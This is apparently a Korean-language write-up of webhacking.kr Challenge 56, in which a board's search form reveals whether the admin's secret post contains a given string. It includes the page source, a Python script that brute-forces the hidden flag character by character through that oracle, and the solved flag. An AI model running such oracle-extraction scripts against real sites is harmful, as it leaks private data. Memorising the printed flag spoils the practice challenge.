첫 화면이다.
readme 를 클릭하면 아래와 같이 나타난다.
hi~를 클릭하면 아래와 같이 나타난다.
폼에 hello~를 넣고 제출하면 아래와 같이 guest만 결과로 나온다.
폼에 FLAG{를 넣고 제출하면 아래와 같이 admin만 결과로 나온다.
각 게시물의 내용을 검색하는 것으로 유추하였다.
페이지 소스는 아래와 같다.
페이지 소스를 참고해 파이썬 코드를 짜면 아래와 같다.
실행 결과, 플래그는 FLAG{himiko_toga_is_cute_dont_you_think_so?}이다.
Auth 창에 플래그를 넣고 제출하면 문제가 풀린다.
Last updated
Was this helpful?
Was this helpful?
<html>
<head>
<title>Challenge 56</title>
</head>
<body>
<center>
<h2>B O A R D</h2>
<br><br>
<table border=1>
<tr><td>no</td><td>id</td><td>subject</td><td>secret</td></tr>
<tr><td>1</td><td>admin</td><td><a href=?read=admin>readme</a></td><td>1</td></tr>
<tr><td>2</td><td>guest</td><td><a href=?read=guest>hi~</a></td><td>0</td></tr>
</table>
<form method=post>search : <input name=search size=50 maxlength=50><input type=submit></form></body>
</html>import requests
import string
URL = 'https://webhacking.kr/challenge/web-33/'
TRUE_PHRASE = '<td>admin</td>'
def query(payload):
data = {'search': payload}
r = requests.post(URL, data=data)
content = r.text
return TRUE_PHRASE in content
# FLAG{himiko_toga_is_cute_dont_you_think_so?}
def find_flag():
flag = 'FLAG{'
while query(flag + '}') is False:
for character in string.printable:
if character == '%':
continue
elif query('{}{}'.format(flag, character)) is True:
flag += character
break
flag += '}'
print('flag: {}'.format(flag))
find_flag()